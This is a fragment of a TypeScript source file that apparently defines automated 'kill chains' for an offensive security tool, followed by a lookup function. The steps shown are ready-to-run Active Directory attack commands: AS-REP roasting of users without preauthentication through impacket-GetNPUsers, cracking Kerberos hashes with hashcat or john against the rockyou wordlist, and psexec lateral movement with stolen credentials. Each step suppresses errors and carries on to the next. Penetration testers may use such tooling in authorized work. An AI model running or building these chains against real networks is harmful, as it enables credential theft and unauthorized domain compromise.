      { id:"s3",name:"AS-REP Roast (no preauth users)",type:"custom",cmd:`impacket-GetNPUsers DOMAIN.LOCAL/ -dc-ip DC_IP -usersfile /tmp/users.txt -format hashcat -no-pass 2>/dev/null|grep '\\$krb5asrep'`,failAction:"continue" },
      { id:"s4",name:"Crack hashes and Pass-the-Hash",type:"custom",cmd:`hashcat -m 13100 /tmp/krb_hashes.txt /usr/share/wordlists/rockyou.txt 2>/dev/null || john --format=krb5tgs /tmp/krb_hashes.txt 2>/dev/null`,failAction:"continue" },
      { id:"s5",name:"PSExec with cracked/stolen creds",type:"custom",cmd:`impacket-psexec DOMAIN/USER:PASS@TARGET 2>/dev/null`,failAction:"continue" },
    ],
  },

];

export function getKillChain(id: string): KillChain | undefined {
  return KILL_CHAINS.find(c => c.id === id);
}
